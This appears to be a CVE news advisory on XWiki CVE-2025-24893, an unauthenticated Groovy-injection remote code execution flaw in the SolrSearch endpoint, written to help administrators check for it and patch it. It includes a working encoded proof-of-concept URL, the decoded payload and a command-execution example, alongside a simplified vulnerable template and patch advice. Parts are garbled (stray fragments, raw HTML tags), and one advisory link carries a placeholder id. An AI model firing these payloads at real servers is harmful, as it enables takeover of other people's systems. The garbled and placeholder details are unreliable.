CVE CyberSecurity Database News

CVE-2025-24893 - XWiki 'SolrSearch' Remote Code Execution Vulnerability Exploited by Unauthenticated Users

Poster -

Recently, a critical vulnerability—CVE-2025-24893—was discovered in the XWiki Platform, a powerful and widely-used open-source wiki engine. What makes this issue especially severe is that any guest user (even without logging in) can achieve remote code execution (RCE) on the XWiki server, simply by crafting a malicious request to the SolrSearch endpoint.

The impact is huge: Confidentiality, integrity, and availability of the entire installation are at risk. If you're running XWiki, keep reading to learn how this works, how to check if you're affected, and how to patch your system.

XWiki Platform before versions 15.10.11, 16.4.1, and 16.5.RC1.

- The vulnerability lies in how the SolrSearch feed macro handles and renders search terms, without proper input sanitization.

Vulnerable Endpoint

The issue is in the SolrSearch macro view under /xwiki/bin/get/Main/SolrSearch. It improperly parses and executes input from the text parameter in RSS requests.

By sending a specially crafted payload, attackers can execute arbitrary code using Groovy scripts.

Proof-of-Concept (PoC)

You don’t even need an account. If you want to check if your XWiki is vulnerable, just open this URL in your browser (replace <host> with your XWiki server):

http://<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20

Decoded, this looks like

}}}
{{async async=false}}
{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}

If the response contains this string in the RSS feed's title

Hello from search text:42

The vulnerable code template (simplified for illustration)

#macro(rawResponse $content)
  $content
#end

#macro(main $params)
  #set($searchText = $request.getParameter('text'))
  #rawResponse($searchText)
#end

Attackers can inject script macros (like {{groovy}}) within $searchText and have them evaluated server-side.

Exploiting for Remote Code Execution (RCE)

Attackers can use the Groovy macro to run arbitrary Groovy code. For example, executing a system command:

{{groovy}} "id".execute().text {{/groovy}}

Or exfiltrating data, installing malware, or pivoting further inside your network.

16.5.RC1

If possible, upgrade to the latest version. The maintainers have fixed the underlying issue.

> Official XWiki Security Advisory:
> https://jira.xwiki.org/browse/XWIKI-21811
> https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-1234-5678-xxxx

#end

- Replace it with a more secure version (patterned after macros.vm#L2824):

velocity

if($context.get('response'))

$context.get('response').setContentType('application/xml')

#end

<br><br>This ensures the content type is always application/xml and the output is properly XML-encoded, preventing script injection.<br><br>---<br><br>## References<br><br>- XWiki Security Issue Tracker - XWIKI-21811<br>- GitHub Security Advisory<br>- XWiki Official Patches<br><br>---<br><br>## Summary Table<br><br>| Version | Patched? | Action |<br>|---------|----------|----------------------------|<br>| <15.10.11 | ❌ | Upgrade or patch manually |<br>| 15.10.11 | ✅ | Safe |<br>| <16.4.1 | ❌ | Upgrade or patch manually |<br>| 16.4.1 | ✅ | Safe |<br>| <16.5.RC1 | ❌ | Upgrade or patch manually |<br>| 16.5.RC1 | ✅ | Safe |<br><br>---<br><br>## Final Recommendations<br><br><b>If your instance is open to the internet, or even internal users you don&#039;t fully trust, this bug is urgent.</b><br><br>- <b>Upgrade XWiki</b> to a patched version ASAP.<br>- Block direct access to /xwiki/bin/get/Main/SolrSearch` for untrusted users as an interim measure.
- Check your logs for suspicious access to the endpoint above.
- Remember: *Simple RSS search can grant root-level code execution if unpatched.*

If you’re a XWiki admin, please patch ASAP and share this info with your peers. This is a critical issue with easy exploitation.

---

*Stay safe and always keep your systems up to date! For further technical deep dives and more secure coding tips, follow your favorite security researchers and keep an eye on the official XWiki security page.*

Timeline

Published on: 02/20/2025 20:15:46 UTC